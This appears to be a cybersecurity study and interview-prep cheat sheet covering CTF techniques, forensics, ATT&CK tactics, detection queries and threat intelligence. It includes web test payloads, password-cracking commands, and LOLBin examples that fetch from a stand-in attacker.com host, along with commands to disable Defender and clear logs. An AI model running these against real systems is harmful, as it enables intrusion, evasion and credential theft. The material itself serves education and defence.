Event 10 — ProcessAccessProcess accessing another — lsass.exe access for cred dumping (Mimikatz)
Event 11 — FileCreateFile created/overwritten — detect malware drops, ransomware activity
Event 12/13 — RegistryRegistry key/value create or set — detect persistence, Run key additions
Event 15 — FileCreateStreamHashAlternate Data Stream (ADS) creation — malware hiding data in NTFS streams
Event 17/18 — PipeNamed pipe create/connect — PsExec, lateral movement via named pipes
Event 22 — DNS QueryDNS lookups by process — C2 domain beaconing, DGA detection
Encoding Identification
Base64Characters: A-Z a-z 0-9 +/= — ends with = padding. Example: SGVsbG8gV29ybGQ=
Base32Characters: A-Z 2-7 = — uppercase only, longer than base64. Example: JBSWY3DPEB3W64TMMQ======
Base58Like base64 but no 0,O,I,l,+,/ — used in Bitcoin addresses. Example: 5HueCGU8rMjxECyDQpsmaue5
Base85 / Ascii85Dense encoding, 5 chars per 4 bytes, starts with <~ ends with ~>
HexCharacters: 0-9 a-f, always even length. Example: 48656c6c6f = "Hello"
BinaryOnly 0s and 1s, usually in groups of 8. 01001000 01101001 = "Hi"
OctalDigits 0-7 only. Often prefixed with 0. 110 145 154 154 157 = "Hello"
Morse CodeDots and dashes separated by spaces. .... . .-.. .-.. --- = "HELLO"
ROT13Letters only shifted 13. Recognizable: readable English but with wrong letters. Apply ROT13 again to decode.
Caesar CipherShifted alphabet — try all 26 shifts. Letters shift by N positions.
AtbashA↔Z B↔Y — mirror of alphabet. Self-inverse (decode = encode again).
URL Encoding%XX format where XX is hex. Space = %20, / = %2F, @ = %40
HTML Entities&amp; &lt; &gt; &#decimal; &#xhex; format
JWTThree base64url parts separated by dots: header.payload.signature — starts with eyJ
Bacon CipherUses A and B (or two symbols) in groups of 5. AAAAA=A AAAAB=B etc.
VigenèrePolyalphabetic cipher with keyword. Use frequency analysis + Kasiski test to find key length.
Steganography Hints
strings image.pngExtract printable strings from binary — hidden text, flags
file image.xxxCheck actual file type — mismatched extension is a hint
xxd image.png | head -20Check magic bytes and file structure
exiftool image.jpgRead EXIF metadata — coordinates, software, description, author, comments
binwalk -e fileExtract embedded files — ZIP, PNG, ELF hidden inside another file
zsteg image.pngLSB steganography detector for PNG/BMP — checks all bit planes
steghide extract -sf image.jpgExtract data hidden with steghide (may need passphrase)
stegsolve.jarVisual steg analysis — bit planes, color filters, XOR between images
audacity (spectrogram view)Hidden messages in audio spectrograms — use Spectrogram view mode
sonic-visualiserAdvanced audio analysis — better spectrogram + waveform tools
foremost / photorecFile carving from disk images or raw data streams
pngcheck -v image.pngCheck PNG chunks — hidden tEXt, zTXt, or unknown chunks
LSB patternIf image has slightly off colors or large file size — check least significant bits of RGB channels
Check IDAT chunksExtra data after IEND marker in PNG = appended content. Use: xxd file | grep -A2 "IEND"
Cryptography Patterns
RSA — small NFactor N with factordb.com or yafu — if N is small enough, get p and q → compute d
RSA — e=3, small mCube root attack — if m^3 < N, then c^(1/3) = m directly
RSA — common factorTwo public keys sharing a prime: gcd(N1, N2) = p → factor both keys
XOR with short keyFrequency analysis + known plaintext (e.g., flag starts with "CTF{"). Try key lengths 1-20.
Repeating XORKasiski test for key length → frequency analysis each column → solve each key byte
ECB ModeSame plaintext block → same ciphertext block. Detect: identical blocks in ciphertext → ECB mode.
CBC Bit-FlipFlip bits in ciphertext block N to control plaintext of block N+1
Padding OracleIf "padding error" vs "decryption error" differ — PKCS#7 padding oracle attack. Tool: padbuster
MD5 Length ExtensionIf MAC = MD5(secret||message), use hashpump to extend message without knowing secret
AES ECB Prefix AttackControl prefix before secret — one byte at a time → brute force each byte
Discrete Log (DLP)If g^x mod p with small p — use Baby-step Giant-step or Pohlig-Hellman
Hash Collision (MD5)MD5 is broken — two different files with same MD5 exist. Check CTF for md5collgen tool.
Common File Magic Bytes
FF D8 FFJPEG image
89 50 4E 47 0D 0A 1A 0APNG image
47 49 46 38GIF image (GIF8)
50 4B 03 04ZIP archive (also .docx, .xlsx, .jar, .apk)
52 61 72 21RAR archive (Rar!)
1F 8B 08GZIP compressed
42 5A 68BZIP2 compressed (BZh)
7F 45 4C 46ELF binary (Linux executable)
4D 5APE executable (MZ) — Windows .exe / .dll
25 50 44 46PDF (%PDF)
D0 CF 11 E0Microsoft Office (old .doc, .xls format)
7B 0A or 7B 22JSON ({)
3C 3F 78 6D 6CXML (<?xml)
CA FE BA BEJava class file
FD 37 7A 58 5A 00XZ compressed
Linux Forensics / CTF Commands
file * 2>/dev/nullIdentify all files in current directory
xxd file | head -5First 5 lines hex dump — check magic bytes
strings -n 6 file | grep -i "flag\|ctf\|key"Search for flag strings (min 6 chars)
strings file | grep -E "^[A-Za-z0-9+/]{20,}={0,2}$"Find base64 strings in binary
python3 -c "print(bytes.fromhex('48656c6c6f'))"Decode hex to ASCII
echo "SGVsbG8=" | base64 -dDecode base64
cat file | tr 'A-Za-z' 'N-ZA-Mn-za-m'ROT13 decode via tr
python3 -c "import base64; print(base64.b32decode('JBSWY3DP'))"Decode Base32
objdump -d -M intel binary | lessDisassemble binary (Intel syntax)
ltrace ./binaryTrace library calls — see strcmp, strncmp calls (check password comparisons)
strace ./binaryTrace syscalls — see file opens, network connections
gdb -q ./binaryDebug binary. info functions, disas main, break *main+offset
chmod +x file && ./fileMake executable and run
zip2john archive.zip > hash.txt && john hash.txtCrack ZIP password with John
Web CTF Checklist
View page sourceCtrl+U — check comments, hidden fields, JavaScript, inline flags
Check robots.txt/robots.txt — disallowed paths often contain interesting endpoints
Check /.git/Exposed .git directory — download with git-dumper, recover source code
Check /backup/ /old/ /.bakCommon backup file locations and extensions
gobuster dir -u URL -w /usr/share/wordlists/dirb/common.txtDirectory brute force
curl -v URL 2>&1 | grep -i "flag\|secret\|key"Check response headers for hidden data
SQLi in every parameterTry: ' " ; -- ) 1' OR '1'='1 — watch for errors or behavior changes
LFI: ?file=../../../etc/passwdCheck all file parameters for directory traversal
SSTI: {{7*7}} or ${7*7}Test template injection — output of 49 = vulnerable
Check cookiesDecode cookie value — base64, JWT, serialized objects, signed sessions
Inspect JS filesLook for API keys, hardcoded passwords, hidden endpoints, commented-out code
IDOR: change user IDChange id=1 to id=2 in URL or body — access other users' data
Useful CTF Resources
CyberChefgchq.github.io/CyberChef — Swiss army knife for encoding, crypto, analysis
dcode.frCipher identifier + decoder for 200+ historical ciphers
factordb.comFactor large integers — RSA n factoring
quipqiup.comSubstitution cipher solver using frequency analysis
md5hashing.net / crackstationOnline hash lookup / rainbow tables
RsaCtfToolgithub.com/RsaCtfTool — automates common RSA attacks
pwntoolsPython CTF framework — exploit writing, format strings, ROP chains
Ghidra / IDA FreeReverse engineering / decompilation for binaries
Volatility 3Memory forensics framework — process analysis, network, registry
WiresharkPCAP analysis — filter, follow streams, export objects
file-recovery.com / undelete.onlineRecover deleted files from disk images
CTFtime.orgUpcoming CTF competitions, team rankings, past writeups
HackTheBox / TryHackMePractice labs and challenges
PicoCTFBeginner-friendly CTF with free archive of past challenges
Buffer Overflow / PWN
python3 -c "print('A'*200)" | ./binarySend cyclic pattern to find crash — increase length until SIGSEGV
cyclic 200 (pwntools)Generate De Bruijn sequence — find exact offset from crash value
cyclic -l 0x61616161Find offset from EIP value after crash
checksec ./binaryCheck protections: RELRO, Stack Canary, NX, PIE, ASLR
ROPgadget --binary ./binary | grep "pop rdi"Find ROP gadgets for ret2libc or ROP chain building
ropper -f ./binary --search "pop rdi"Alternative ROP gadget finder
ldd ./binaryShow linked libraries — find libc address for ret2libc
readelf -s /lib/x86_64-linux-gnu/libc.so.6 | grep " system"Find system() offset in libc
strings -a -t x /lib/x86_64-linux-gnu/libc.so.6 | grep "/bin/sh"Find /bin/sh string offset in libc
gdb -q ./binary → run → info registers → x/20xw $espGDB: crash, dump registers, inspect stack
pwndbg / peda / gefGDB plugins that add heap visualization, ROP chain tools, and pattern searching
from pwn import *; p = process('./binary'); p.sendline(payload)Pwntools script skeleton for local exploit
Password Cracking
hashcat -m 0 hash.txt rockyou.txtMD5 dictionary attack
hashcat -m 1000 hash.txt rockyou.txtNTLM hash cracking
hashcat -m 1800 hash.txt rockyou.txtsha512crypt ($6$) — Linux /etc/shadow
hashcat -m 13100 hash.txt rockyou.txtKerberoast (TGS-REP)
hashcat -m 18200 hash.txt rockyou.txtAS-REP Roast hash
hashcat -a 3 hash.txt ?a?a?a?a?a?aBrute force all 6-char combinations (all charsets)
hashcat -r rules/best64.rule hash.txt rockyou.txtRule-based mutation — password1, Password!, P@ssw0rd etc.
john --format=NT hash.txt --wordlist=rockyou.txtJohn the Ripper — NTLM cracking
john --rules --wordlist=rockyou.txt hash.txtJohn with mangling rules
hashid hash.txtIdentify hash type from format/length
hash-identifierInteractive hash type identification
crackstation.net / hashes.comOnline rainbow table lookup — fast for common hashes
Network Forensics (PCAP)
tcpdump -r file.pcap -nRead PCAP and display packets (no DNS resolution)
tcpdump -r file.pcap -n 'port 80' -AFilter HTTP traffic and show ASCII payload
networkMiner file.pcapGUI PCAP analyzer — auto-extracts files, credentials, sessions
zeek -r file.pcapZeek (Bro) — generate connection/DNS/HTTP/SSL logs from PCAP
zeek-cut id.orig_h id.resp_h id.resp_p proto < conn.log | sort | uniq -cTop connections from Zeek conn.log
tshark -r file.pcap -Y "http.request" -T fields -e http.host -e http.request.uri -e http.request.methodExtract all HTTP requests
Follow TCP Stream in WiresharkRight-click any packet → Follow → TCP Stream to reconstruct full session
File → Export Objects → HTTP/SMB/FTPExtract transferred files from PCAP in Wireshark
strings file.pcap | grep -E "password|passwd|credential"Quick credential search in raw PCAP bytes
ngrep -I file.pcap -q 'USER|PASS' tcpPattern match across packet payloads (like grep for packets)
Enterprise ATT&CK — 14 Tactics Overview
TacticIDKey Techniques
ReconnaissanceTA0043T1595 Active Scanning · T1590 Gather Victim Network Info · T1589 Gather Victim Identity · T1598 Phishing for Info
Resource DevelopmentTA0042T1583 Acquire Infrastructure · T1584 Compromise Infrastructure · T1587 Develop Capabilities · T1586 Compromise Accounts
Initial AccessTA0001T1566 Phishing · T1190 Exploit Public-Facing App · T1133 External Remote Services · T1195 Supply Chain Compromise · T1078 Valid Accounts
ExecutionTA0002T1059 Command & Scripting (PowerShell/Bash/cmd) · T1053 Scheduled Task · T1047 WMI · T1204 User Execution · T1203 Exploitation for Client Exec
PersistenceTA0003T1547 Boot/Logon Autostart (Run Keys) · T1053 Scheduled Task · T1543 Create/Modify System Process · T1136 Create Account · T1078 Valid Accounts
Privilege EscalationTA0004T1548 Abuse Elevation Control (UAC Bypass) · T1134 Token Manipulation · T1068 Exploit for PrivEsc · T1055 Process Injection · T1611 Escape to Host
Defense EvasionTA0005T1036 Masquerading · T1055 Process Injection · T1027 Obfuscated Files · T1562 Impair Defenses (disable AV/logs) · T1070 Indicator Removal · T1218 Signed Binary Proxy (LOLBAS)
Credential AccessTA0006T1110 Brute Force · T1003 OS Credential Dumping (LSASS/Mimikatz) · T1558 Kerberoasting / AS-REP Roasting · T1555 Credentials from Password Stores · T1056 Keylogging
DiscoveryTA0007T1082 System Info · T1083 File & Dir Discovery · T1087 Account Discovery · T1018 Remote System Discovery · T1049 Network Connections · T1069 Permission Groups (AD)
Lateral MovementTA0008T1021 Remote Services (RDP/WinRM/SMB) · T1550 Pass-the-Hash/Ticket · T1210 Exploit Remote Services · T1534 Internal Spearphishing · T1570 Lateral Tool Transfer
CollectionTA0009T1005 Data from Local System · T1039 Data from Network Shared Drive · T1115 Clipboard · T1113 Screen Capture · T1560 Archive Collected Data · T1056 Input Capture
Command & ControlTA0011T1071 App Layer Protocol (HTTP/S/DNS) · T1572 Protocol Tunneling · T1573 Encrypted Channel · T1090 Proxy · T1095 Non-App Layer (raw TCP/UDP) · T1102 Web Service (C2 via Pastebin/GitHub)
ExfiltrationTA0010T1041 Exfil Over C2 Channel · T1567 Exfil Over Web Service (cloud storage) · T1048 Exfil Over Alt Protocol (DNS/ICMP) · T1020 Automated Exfiltration · T1030 Data Transfer Size Limits
ImpactTA0040T1486 Data Encrypted (Ransomware) · T1490 Inhibit System Recovery (VSS delete) · T1489 Service Stop · T1485 Data Destruction · T1498 Network DoS · T1491 Defacement
Top Techniques by Frequency (Red Canary 2024)
RankTechniqueIDWhy It Matters
1PowerShellT1059.001Widely abused for download-cradles, encoded commands, LOLBins
2Windows Command ShellT1059.003cmd.exe used in chained execution, batch scripts, persistence
3Scheduled TaskT1053.005Common persistence and lateral execution mechanism
4OS Credential Dumping: LSASST1003.001Mimikatz, Task Manager, procdump targeting lsass.exe
5Ingress Tool TransferT1105certutil, bitsadmin, curl, Invoke-WebRequest downloading payloads
6MasqueradingT1036Malware named svchost.exe, lsass.exe, or placed in System32
7Process InjectionT1055Shellcode injection into legitimate processes (explorer, notepad)
8Windows Management InstrumentationT1047WMI for lateral movement, persistence, remote execution
Detection & Hunting Queries
PowerShell encoded cmdprocess.name = "powershell.exe" AND process.args = "*-enc*"
LSASS accessevent.action = "OpenProcess" AND target.process.name = "lsass.exe"
Scheduled task creationevent.code = 4698 OR (process.name = "schtasks.exe" AND process.args = "*/create*")
Lateral movement via SMBevent.code = 4624 AND winlog.event_data.LogonType = "3" AND source.ip != "127.0.0.1"
Shadow copy deletionprocess.command_line CONTAINS "vssadmin" AND process.command_line CONTAINS "delete shadows"
Defender disabledevent.code = 5001 OR process.command_line CONTAINS "Set-MpPreference -DisableRealtimeMonitoring $true"
DNS beaconing (Splunk)index=dns | stats count by src_ip, query | where count > 100 | sort -count
Kerberoastingevent.code = 4769 AND winlog.event_data.TicketEncryptionType = "0x17"
ATT&CK Navigator Tips
mitre-attack.github.io/attack-navigatorColor-code techniques by detection coverage, threat actor, or campaign
Threat actor mappingSearch ATT&CK for a group (e.g., APT29) to see all their known techniques
Coverage heatmapExport current detections as JSON → import into Navigator to visualize gaps
SIGMA rulesgithub.com/SigmaHQ/sigma — community detection rules mapped to ATT&CK techniques
D3FENDd3fend.mitre.org — defensive countermeasures mapped to ATT&CK techniques
Notable Threat Actor Profiles
GroupAttributionKnown For
APT29 (Cozy Bear)Russia / SVRSolarWinds supply chain (2020), spearphishing, OPSEC-heavy TTP, WellMess / SUNBURST malware
APT28 (Fancy Bear)Russia / GRUDNC hack (2016), VPNFilter, X-Agent/SOURFACE, password spraying against govt targets
Lazarus GroupNorth Korea / RGBSony breach (2014), WannaCry (2017), SWIFT banking theft, crypto exchange targeting
APT41 (Double Dragon)China / MSSDual espionage + cybercrime, supply chain attacks, gaming industry financial fraud
APT10 (Stone Panda)China / MSSMSP targeting — Cloud Hopper campaign, stole IP from 45+ countries via managed service providers
SandwormRussia / GRU Unit 74455Ukrainian power grid attacks (2015/2016), NotPetya (2017), Olympic Destroyer (2018)
FIN7 (Carbanak)Financial crime groupPoint-of-sale malware, restaurant/hotel targeting, CARBANAK banking trojan
Scattered SpiderEnglish-speaking groupMGM/Caesars breach (2023), SIM swapping, social engineering IT helpdesks for access
Cl0pRussian-speaking eCrimeMOVEit zero-day exploitation (2023), mass data extortion, no ransomware — pure extortion
Defense Evasion Sub-Techniques
T1036.003 — Rename System UtilitiesCopy cmd.exe to svchost.exe, place in writable dir — bypasses name-based detection
T1218.011 — Rundll32rundll32.exe javascript: or DLL execution — proxy execution to bypass AV
T1218.005 — Mshtamshta.exe http://attacker.com/payload.hta — execute remote HTA file
T1218.010 — Regsvr32regsvr32 /s /n /u /i:http://attacker.com/file.sct scrobj.dll — Squiblydoo technique
T1027.002 — Obfuscated Files (Software Packing)UPX packed malware, custom packers, VM-protected code to bypass static analysis
T1070.001 — Clear Windows Event Logswevtutil cl Security / System / Application — attacker covering tracks
T1562.001 — Disable Windows DefenderSet-MpPreference -DisableRealtimeMonitoring $true or via Group Policy
T1134.002 — Token ImpersonationSteal token from SYSTEM process → impersonate SYSTEM. Implemented in Metasploit getsystem
T1055.001 — DLL InjectionVirtualAllocEx + WriteProcessMemory + CreateRemoteThread into target process
T1055.012 — Process HollowingSpawnSuspended(svchost.exe) → NtUnmapViewOfSection → WriteProcessMemory → ResumeThread
SIGMA Rule Structure
titleShort descriptive name of what the rule detects
status: experimental / test / stableMaturity level — experimental rules have higher FP rate
logsource: category / product / serviceWhere to apply: category: process_creation, product: windows, service: security
detection: selection + conditionselection defines what to match; condition says how to combine (selection and not filter)
falsepositivesKnown sources of false positives — helps analysts tune rules
tags: attack.t1059.001Maps to ATT&CK technique — enables Navigator coverage mapping
sigmac / pySigmaConvert SIGMA rules to Splunk SPL, KQL, EQL, Lucene, Elastic rule format
sigma-cli convert -t splunk rule.ymlConvert SIGMA rule to Splunk SPL query
Core Concepts
CIA TriadConfidentiality (only authorized access) · Integrity (data unchanged) · Availability (systems accessible). Ransomware attacks all three.
IDS vs IPSIDS = passive, detects and alerts. IPS = inline, detects and blocks. IDS has no impact on traffic; IPS can cause latency and false-block legitimate traffic.
SIEMCollects, normalizes, and correlates logs from multiple sources. Generates alerts via correlation rules. Provides search, dashboards, and long-term log retention for investigations.
False Positive vs False NegativeFP: alert fires on benign activity (alert fatigue). FN: real attack is missed (silent failure). FNs are more dangerous; FPs waste analyst time.
Risk = Threat × Vulnerability × ImpactPatch reduces vulnerability. Controls reduce impact. Threat intel helps prioritize which threats to focus on.
Defense in DepthMultiple layers of controls: perimeter (firewall/IPS) → network (segmentation) → endpoint (EDR/AV) → application (WAF) → data (encryption/DLP) → identity (MFA).
Zero Trust"Never trust, always verify." No implicit trust based on network location. Continuous verification of identity, device health, and least-privilege access.
Least PrivilegeUsers/services get only the minimum access required. Limits blast radius of compromise. Implement with RBAC, PAM, and regular access reviews.
Incident Response Process
6 IR Phases (NIST)1. Preparation2. Identification3. Containment4. Eradication5. Recovery6. Lessons Learned
Containment vs EradicationContainment: stop the spread (isolate host, block IP, disable account). Eradication: remove the threat (delete malware, patch vuln, reset creds). Do containment first — eradication without containment lets attackers persist.
Ransomware Response1. Isolate infected systems (network block). 2. Identify patient zero and initial vector. 3. Preserve volatile data (RAM, running processes). 4. Check backups before paying. 5. Notify legal/compliance. 6. Rebuild from clean image.
Chain of CustodyDocumented record of who collected, handled, and transferred evidence. Maintains evidence integrity for legal proceedings. Hash all collected artifacts immediately.
Order of VolatilityRAM → swap/pagefile → network connections → running processes → disk → backups. Collect most volatile first to avoid losing data when system restarts.
Triage vs Full ForensicsTriage: fast collection of key artifacts (prefetch, event logs, registry) for quick decisions. Full forensics: complete disk image for deep analysis. Choose triage when you have many machines to process.
Technical Questions
Pass-the-HashUsing a captured NTLM hash to authenticate without knowing the plaintext password. Mitigate: Credential Guard, disable NTLM where possible, use Protected Users group, network segmentation.
KerberoastingRequest TGS tickets for service accounts, crack the RC4-encrypted ticket offline. Detect: event 4769 with encryption type 0x17. Mitigate: strong service account passwords (25+ chars), AES enforcement.
AS-REP RoastingAttack accounts with "Do not require Kerberos pre-authentication" — request AS-REP, crack hash offline. Event 4768. Mitigate: require pre-auth for all accounts.
Living Off the Land (LOLBAs)Using built-in OS binaries for malicious purposes (certutil, mshta, regsvr32, rundll32, wscript). Evades AV. Detect via process tree anomalies and unusual parent-child relationships.
SQL InjectionInserting SQL syntax into input fields to manipulate database queries. Types: in-band, blind, out-of-band. Prevent: parameterized queries / prepared statements, input validation, WAF.
Lateral Movement DetectionLook for: unusual SMB connections (4624 Type 3), new service installs on remote hosts (7045), admin share access (\\host\ADMIN$), WMI network activity, PsExec artefacts (PSEXESVC service).
BeaconingRegular C2 check-ins from compromised host. Detect: high frequency DNS queries to same domain, regular time-interval outbound connections, large number of requests to a single IP, low byte payloads at fixed intervals.
Process HollowingStart a legitimate process suspended, replace its memory with malicious code, resume. Detect: PE image path ≠ on-disk file, unusual memory regions in known processes.
Scenario Questions
1000 failed logins → 1 success1. Check geo/IP of success vs failures. 2. Determine what account and resource was accessed. 3. If suspicious: force password reset, invalidate sessions, isolate host, investigate post-auth activity. Classic brute force/credential stuffing pattern.
User opened email attachment, PC slow1. Isolate host from network immediately. 2. Take memory dump if possible. 3. Check running processes, network connections (netstat), scheduled tasks, startup entries. 4. Check email server for other recipients. 5. Preserve evidence, then reimage.
Alert: cmd.exe spawned by Word.exeAlmost always malicious — indicates macro execution or exploitation. 1. Isolate host. 2. Identify parent-child chain and command line arguments. 3. Check for network connections. 4. Look for dropped files. 5. Map to ATT&CK T1566 + T1059.
Alert: PowerShell with -EncodedCommandDecode the base64 payload. Tools: CyberChef, PowerShell: [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String("...")). Determine what it downloads/executes. Check VirusTotal for any dropped hashes.
Unusual outbound DNS trafficCheck for: long DNS names (DNS tunneling indicator), high frequency queries (beaconing), uncommon TLDs, queries to newly registered domains. Tools: Zeek DNS logs, Splunk/SIEM. Confirm with threat intel lookup.
Networking & Protocols
TCP 3-Way HandshakeSYN → SYN-ACK → ACK. A half-open connection (SYN flood) can indicate DoS or port scanning. RST from server = port closed. No response = filtered by firewall.
Common Attack Ports22 (SSH brute), 23 (Telnet), 25 (SMTP relay), 445 (SMB — EternalBlue), 1433 (MSSQL), 3389 (RDP brute), 4444 (Metasploit default), 5985/5986 (WinRM), 8080 (proxy/web), 9001 (Tor)
DNS Record TypesA (IPv4), AAAA (IPv6), MX (mail), TXT (SPF/DKIM/DMARC), CNAME (alias), NS (nameserver), SOA (zone authority), PTR (reverse DNS)
Subnetting/8 = 16M hosts, /16 = 65K hosts, /24 = 254 hosts, /25 = 126 hosts, /26 = 62 hosts, /27 = 30 hosts, /28 = 14 hosts, /30 = 2 hosts (point-to-point)
Tools You Should Know
Splunk / ELK / Microsoft SentinelSIEM platforms for log aggregation, correlation, and alerting. Know SPL (Splunk), KQL (Sentinel), and Lucene/EQL (Elastic).
Wireshark / Zeek / SuricataNetwork analysis and IDS. Know how to filter, follow streams, export objects, and write Suricata rules.
CrowdStrike / SentinelOne / Defender for EndpointEDR platforms. Know how to query telemetry, contain hosts, and pivot from alerts to processes to network to files.
VolatilityMemory forensics. Know: imageinfo, pslist, pstree, netscan, malfind, cmdscan, filescan. Used in malware analysis and IR to detect in-memory threats.
NmapNetwork discovery and port scanning. Know: -sV (version), -sC (scripts), -O (OS detection), -A (aggressive), --script vuln (vulnerability scan).
Malware Analysis Questions
Static vs Dynamic analysisStatic: examine without executing (strings, PE headers, disassembly). Dynamic: run in sandbox and observe behavior (file drops, network, registry). Always do static first to understand before running.
How do you safely analyze malware?Isolated VM with snapshots, no network or host-only network, shared clipboard disabled. Use REMnux or FlareVM. Never run on production or connected systems.
What is packed malware?Malware compressed/encrypted to hide code from static analysis. Signs: high entropy, small import table, UPX headers. Unpack: UPX -d, OllyDbg OEP finding, dynamic unpacking via memory dump.
Indicators from dynamic analysisFile creates/deletes, registry persistence (Run keys), network connections, mutex creation, process injection, API calls (CreateRemoteThread, VirtualAllocEx), DNS queries
What is DGA?Domain Generation Algorithm — malware generates pseudo-random domains daily for C2. Attacker registers one domain; defender can't pre-block all. Detect via high entropy domain names, NXDomain storm, lexical analysis.
Difference: Trojan / Worm / Rootkit / RATTrojan: hides as legit software. Worm: self-replicating via network. Rootkit: hides itself/other malware at OS/kernel level. RAT: Remote Access Trojan — full remote control for attacker.
Tools for Windows malware analysisPE-bear / PEStudio (static), x64dbg / Ghidra (reverse engineering), ProcMon / ProcExp (dynamic), Wireshark (network), Regshot (registry diff), FakeNet-NG (network simulation)
Cloud Security Questions
Shared Responsibility ModelCloud provider secures of the cloud (hardware, hypervisor, physical). Customer secures in the cloud (OS, data, IAM, network config). Misunderstanding this is the #1 cloud breach cause.
What is IAM and least privilege in AWS?Identity & Access Management. Principle: grant only permissions needed. Use IAM roles (not users) for services, never use root account, enable MFA on all accounts, rotate access keys.
How are S3 buckets exposed?Public ACLs, misconfigured bucket policies, Block Public Access not enabled, pre-signed URLs exposed. Check: aws s3api get-bucket-acl + get-bucket-policy. Remediate: enable S3 Block Public Access at org level.
What is IMDS and why is it dangerous?Instance Metadata Service (169.254.169.254) exposes IAM credentials to anything running on the instance. SSRF vulnerability can access it. Mitigation: IMDSv2 (requires session token), block from application network namespace.
Detect compromised IAM credentialsCloudTrail: unusual API calls (unfamiliar regions, new services), GetCallerIdentity from unexpected IPs, IAM policy changes, new user/key creation. GuardDuty automates this detection.
What are Security Groups vs NACLs?Security Groups: stateful, instance-level, allow only (no explicit deny). NACLs: stateless, subnet-level, allow and deny rules, evaluated in order. Use both: NACLs for broad blocks, SGs for fine-grained control.
Compliance & Frameworks
NIST CSF5 Functions: Identify → Protect → Detect → Respond → Recover. Framework for building and improving cybersecurity programs. Not prescriptive — maps to existing standards.
ISO 27001International ISMS standard. Requires risk assessment, Statement of Applicability, 114 controls in Annex A. Certification requires external audit.
PCI DSSPayment Card Industry Data Security Standard. 12 requirements for handling cardholder data. Applies to any org storing/processing/transmitting card data. Annual assessment or quarterly scans.
GDPREU data protection regulation. Requires: lawful basis for processing, breach notification within 72 hours, right to erasure, data minimization. Fines up to 4% of global revenue.
HIPAAUS healthcare data. Protected Health Information (PHI) must be secured. Safeguards: Administrative (policies), Physical (access controls), Technical (encryption, audit controls).
SOC 2Service Organization Controls. Type I: design of controls at a point in time. Type II: operating effectiveness over 6-12 months. 5 Trust Service Criteria: Security, Availability, Confidentiality, Processing Integrity, Privacy.
CIS Controls v818 prioritized controls for cyber defense. IG1 (basic hygiene), IG2 (mid-size orgs), IG3 (mature orgs). Control 1: Asset Inventory. Control 4: Secure Config. Control 6: Access Control Mgmt.
IOC Types & Examples
IOC TypeExampleNotes
IP Address185.220.101.42Can be exit nodes (Tor/VPN) — verify before blocking. Check ASN ownership.
Domainevil-payload.ruCheck registration date — newly registered domains are high risk. Use WHOIS + passive DNS.
URLhttp://evil.com/update.exeFull path matters — same domain may have both malicious and benign paths.
File Hash (MD5)d41d8cd98f00b204e9800998ecf8427eEasily defeated by changing one byte. Use SHA-256 or fuzzy hashes (ssdeep/TLSH) for better coverage.
File Hash (SHA-256)e3b0c44298fc1c149af...bfcGold standard for file IOCs. Query VirusTotal/MalwareBazaar.
Email Addressattacker@phishing-domain.comSender can be spoofed — also check SPF/DKIM/DMARC alignment, not just the From field.
Registry KeyHKCU\Software\Microsoft\Windows\CurrentVersion\Run\MalwareCommon persistence location. Monitor with autoruns or Sysmon EventID 13.
MutexGlobal\{A3B2C1D4-...}Malware creates mutexes to avoid double-infection. Unique per malware family — very reliable IOC.
JA3/JA3S Hash769,47-53-5-10-...,0-ff01-0010TLS client/server fingerprint. Identifies malware C2 even over HTTPS. Can false positive on shared libraries.
JARM Hash29d29d00029d29d00042d...Active TLS fingerprint of servers. Identifies C2 infrastructure. Cobalt Strike has well-known JARM.
TLP — Traffic Light Protocol
TLP:RED For named recipients only. Cannot be shared further. Highest sensitivity — personal briefings, law enforcement.
TLP:AMBER Share within your organization and with clients/customers on a need-to-know basis only.
TLP:AMBER+STRICT Share within your organization only — do NOT share with clients or customers.
TLP:GREEN Share within the wider community (security professionals, trusted ISACs). Not for public posting.
TLP:CLEAR No restriction — may be shared publicly. Previously called TLP:WHITE.
Pyramid of Pain
LevelIndicatorPain to Attacker if Blocked
6 (Hardest)TTPs (Tactics, Techniques, Procedures)Tough — Forces attacker to change behavior entirely. Best long-term defense.
5Tools (Mimikatz, Cobalt Strike, custom malware)Challenging — Must rewrite or replace tools.
4Network/Host Artifacts (mutex, registry keys, User-Agent)Annoying — Must modify malware.
3Domain NamesAnnoying — Must register new domain (cheap but traceable).
2IP AddressesEasy — Change IP or use new VPS (minutes).
1 (Easiest)Hash ValuesTrivial — Recompile or change one byte to get new hash.
Intel Frameworks
Cyber Kill Chain (Lockheed)Recon → Weaponization → Delivery → Exploitation → Installation → C2 → Actions on Objectives. Useful for campaign analysis and defense mapping.
Diamond Model4 features: Adversary ↔ Capability ↔ Infrastructure ↔ Victim. Pivoting on any edge reveals more about the others. Used for attribution and campaign clustering.
MITRE ATT&CKBehavior-based framework of adversary TTPs. More granular than Kill Chain. Use for detection coverage mapping, red/blue team alignment, threat actor profiling.
STIX 2.1Structured Threat Information eXpression — JSON-based format for sharing CTI. Objects: Indicator, Observable, Malware, Campaign, Threat Actor, Attack Pattern, Course of Action, Relationship.
TAXII 2.1Trusted Automated eXchange of Intelligence Information — API protocol for distributing STIX content. Collections and channels. Supported by MISP, OpenCTI, ThreatQ.
MISPOpen-source threat intel platform. Events contain attributes (IOCs), galaxies (ATT&CK), objects, and sharing groups. REST API + PyMISP for automation.
Free Intel Sources & Feeds
SourceWhat It Provides
VirusTotalFile/URL/IP/domain reputation — aggregates 70+ AV engines + behavior sandbox. API available.
AlienVault OTXCommunity IOC feeds — IPs, domains, hashes, pulses. Free API, STIX/TAXII support.
AbuseIPDBCrowdsourced malicious IP database. Report and check IPs. API: api.abuseipdb.com
ShodanSearch engine for internet-exposed services and devices. Identify attacker infrastructure, exposed assets.
CensysSimilar to Shodan — certificate + banner search. Good for infrastructure attribution.
ThreatFox (abuse.ch)IOC database: malware IPs/domains/URLs/hashes with malware family tags. Free API.
URLhaus (abuse.ch)Malware distribution URLs. Updated hourly. Free download in CSV/JSON/MISP format.
MalwareBazaar (abuse.ch)Malware sample sharing platform. Download samples, query by hash/tag/family. Free API.
CIRCL.lu Passive DNSHistorical DNS resolution records — see what IPs a domain resolved to over time.
OpenPhish / PhishTankActive phishing URL feeds. Good for email security and SOC enrichment.
CISA KEVKnown Exploited Vulnerabilities catalog — CVEs actively exploited in the wild. Mandatory patching guide for US federal agencies, strong signal for everyone.
IOC Confidence & Context
Sightings countHow many times an IOC was observed across sources — more sightings = higher confidence
Age of IOCStale IOCs (6+ months old IPs/domains) may be reused or reassigned — verify before blocking
False Positive RateShared hosting IPs, CDN ranges (Cloudflare/AWS/Azure) — contain thousands of customers. Block at URL level, not IP.
Context enrichmentAlways enrich: ASN owner, geo, hosting provider, passive DNS history, WHOIS age, community tags
